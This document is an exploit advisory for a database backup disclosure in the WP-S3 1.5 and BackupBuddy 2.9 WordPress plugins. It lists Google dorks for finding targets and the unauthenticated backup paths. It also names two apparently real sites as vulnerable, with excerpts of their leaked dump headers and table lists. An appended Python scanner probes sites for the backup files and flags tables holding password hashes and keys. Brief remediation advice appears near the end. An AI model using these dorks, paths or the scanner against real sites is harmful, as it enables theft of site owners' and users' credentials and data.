WordPress Amazon WP-S3 plugin version 1.5, used with iThemes BackupBuddy 2.9, suffers from a database backup disclosure vulnerability: the backup files are written to a predictable path under wp-content/uploads/ and are served to unauthenticated requests.
776ea1da0e8e3b190a85600d0d9a6783904a097c343499e68a6207fadc499a14
#################################################################################################
# Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~ wordpress.org/plugins/wp-s3/
# Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WP-S3 1.5 - Ithemes-BackupBuddy 2.9
# Exploit Risk : Medium
# Google Dorks : inurl:"/wp-content/uploads/wp-s3-database-backup.sql"
+ intext:"Powered by Shopify"
+ intext:"© 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal Development Powered by Shopify"
+ intext:"2015 © ALL RIGHTS RESERVED BY THE-SCHMIDT"
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit : an unauthenticated GET to either of the following paths, relative to the WordPress root, returns the backup file when the plugin has written it there. No login is required; wp-login.php is listed above only as the location of the admin panel.
/wp-content/uploads/wp-s3-database-backup.sql
/wp-content/uploads/wp-s3-backups.zip
#################################################################################################
# Example SQL dump header and table names => holysparks.org
-- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: raeshaga_wrd1
-- ------------------------------------------------------
-- Server version 5.1.58-community-log
-- Table structure for table `wp_StreamPad_Tracks`
-- Dumping data for table `wp_StreamPad_Tracks`
-- Table structure for table `wp_affiliates_banners_tbl`
-- Dumping data for table `wp_affiliates_banners_tbl`
-- Table structure for table `wp_affiliates_clickthroughs_tbl`
-- Dumping data for table `wp_affiliates_clickthroughs_tbl`
-- Table structure for table `wp_affiliates_leads_tbl`
-- Dumping data for table `wp_affiliates_leads_tbl`
-- Table structure for table `wp_affiliates_payouts_tbl`
-- Dumping data for table `wp_affiliates_payouts_tbl`
-- Table structure for table `wp_affiliates_sales_tbl`
-- Dumping data for table `wp_affiliates_sales_tbl`
-- Table structure for table `wp_affiliates_tbl`
-- Dumping data for table `wp_affiliates_tbl`
-- Table structure for table `wp_commentmeta`
-- Dumping data for table `wp_commentmeta`
-- Table structure for table `wp_comments`
-- Dumping data for table `wp_comments`
-- Table structure for table `wp_contact_form_7`
-- Dumping data for table `wp_contact_form_7`
-- Table structure for table `wp_ft_wpecards`
-- Dumping data for table `wp_ft_wpecards`
-- Table structure for table `wp_links`
-- Dumping data for table `wp_links`
-- Table structure for table `wp_options`
-- Dumping data for table `wp_options`
-- Dump completed....
################################################################################################
# Example SQL dump header and table names => the-schmidt.com
-- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: theschm1_blog
-- ------------------------------------------------------
-- Server version 5.1.60-community-log
-- Table structure for table `wp_PluginManager`
-- Dumping data for table `wp_PluginManager`
-- Table structure for table `wp_custom_fonts`
-- Dumping data for table `wp_custom_fonts`
-- Table structure for table `wp_cvg_gallery`
-- Dumping data for table `wp_cvg_gallery`
-- Table structure for table `wp_cvg_videos`
-- Dumping data for table `wp_cvg_videos`
-- Table structure for table `wp_download_status`
-- Dumping data for table `wp_download_status`
-- Table structure for table `wp_fancybox`
-- Dumping data for table `wp_fancybox`
-- Table structure for table `wp_item_category_associations`
-- Dumping data for table `wp_item_category_associations`
-- Table structure for table `wp_links`
-- Dumping data for table `wp_links`
-- Table structure for table `wp_ngg_album`
-- Dumping data for table `wp_ngg_album`
-- Table structure for table `wp_ngg_gallery`
-- Dumping data for table `wp_ngg_gallery`
-- Table structure for table `wp_ngg_pictures`
-- Dumping data for table `wp_ngg_pictures`
-- Table structure for table `wp_also_bought_product`
-- Dumping data for table `wp_also_bought_product`
-- Table structure for table `wp_blc_filters`
-- Dumping data for table `wp_blc_filters`
-- Table structure for table `wp_blc_instances`
-- Dumping data for table `wp_blc_instances`
-- Table structure for table `wp_blc_links`
-- Dumping data for table `wp_blc_links`
-- Table structure for table `wp_options`
-- Dumping data for table `wp_options`
-- Dump completed...
#################################################################################################
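# Added example, not part of the original advisory and not code from the plugin vendor or the
# discoverer: a checker for the two backup paths in the Exploit section above, plus a parser
# that pulls the header and table list out of a recovered dump the way the two excerpts above
# do. The site names, the User-Agent string and SAMPLE_DUMP are constructed for illustration.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Paths from the advisory, relative to the WordPress root.
BACKUP_PATHS = (
    "wp-content/uploads/wp-s3-database-backup.sql",
    "wp-content/uploads/wp-s3-backups.zip",
)

# mysqldump header lines as they appear in the excerpts above.
HOST_DB_RE = re.compile(r"^-- Host:\s*(\S+)\s+Database:\s*(\S+)\s*$", re.M)
VERSION_RE = re.compile(r"^-- Server version\s+(\S+)\s*$", re.M)
TABLE_RE = re.compile(r"^-- Table structure for table `([^`]+)`\s*$", re.M)

# Tables that matter most once a dump leaks: password hashes, user metadata
# (capabilities, session tokens) and site options (plugin API keys, admin e-mail).
SENSITIVE_SUFFIXES = ("users", "usermeta", "options")


def candidate_urls(base_url):
    """Return the two backup URLs for a site root such as https://example.com/blog."""
    if not base_url.endswith("/"):
        base_url += "/"
    return [urljoin(base_url, path) for path in BACKUP_PATHS]


def classify(body):
    """Classify the first bytes of a response body as 'mysqldump', 'zip' or 'other'.

    A 200 carrying an HTML page (a soft 404 from a permalink rewrite) is the
    usual false positive, so the status code is not trusted; only the file
    signature counts as a hit.
    """
    head = body[:64].lstrip()
    if head.startswith(b"-- MySQL dump"):
        return "mysqldump"
    if head[:4] in (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08"):
        return "zip"
    return "other"


def probe(base_url, timeout=10):
    """Fetch only the first 4 KiB of each candidate file and classify it.

    Backups can be very large, so a Range request keeps the check cheap; a
    server that ignores Range still only has 4 KiB read from the socket.
    """
    findings = []
    for url in candidate_urls(base_url):
        req = urllib.request.Request(
            url,
            headers={"User-Agent": "wp-s3-backup-check/1.0",  # constructed UA
                     "Range": "bytes=0-4095"},
        )
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                findings.append((url, resp.status, classify(resp.read(4096))))
        except urllib.error.HTTPError as exc:
            findings.append((url, exc.code, "other"))
        except (urllib.error.URLError, OSError):
            findings.append((url, None, "error"))
    return findings


def dump_summary(text):
    """Extract host, database, server version and table names from a mysqldump
    file, derive the WordPress table prefix and flag the sensitive tables."""
    host_db = HOST_DB_RE.search(text)
    version = VERSION_RE.search(text)
    tables = TABLE_RE.findall(text)
    # All WordPress tables share one prefix ("wp_" by default); read it from the
    # first table name so a non-default prefix is handled as well.
    prefix = tables[0].split("_", 1)[0] + "_" if tables and "_" in tables[0] else ""
    wanted = {prefix + suffix for suffix in SENSITIVE_SUFFIXES}
    return {
        "host": host_db.group(1) if host_db else None,
        "database": host_db.group(2) if host_db else None,
        "server_version": version.group(1) if version else None,
        "table_prefix": prefix,
        "tables": tables,
        "sensitive_tables": [t for t in tables if t in wanted],
    }


# Constructed sample dump in the same layout as the excerpts above (not a real site's data).
SAMPLE_DUMP = """\
-- MySQL dump 10.13  Distrib 5.1.58, for unknown-linux-gnu (x86_64)
--
-- Host: localhost    Database: example_wp
-- ------------------------------------------------------
-- Server version  5.1.58-community-log

--
-- Table structure for table `wp_comments`
--
DROP TABLE IF EXISTS `wp_comments`;

--
-- Table structure for table `wp_options`
--
DROP TABLE IF EXISTS `wp_options`;

--
-- Table structure for table `wp_users`
--
DROP TABLE IF EXISTS `wp_users`;

-- Dump completed on 2018-12-17 10:00:00
"""

if __name__ == "__main__":
    import sys
    for base in sys.argv[1:]:
        for url, status, kind in probe(base):
            print(f"{kind:10} {status!s:>5} {url}")
```

Usage: `python3 check.py https://example.com/ https://example.com/blog/`; any line classified `mysqldump` or `zip` is a confirmed exposure, while a 200 classified `other` is the soft-404 case and not a hit. On the defensive side the same two paths are what to deny in the web server configuration for wp-content/uploads/ (or move backups outside the web root) while the dump is rotated out and every credential and key held in the flagged tables is changed.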
# Example Vulnerable Sites =>
[+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql
[+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################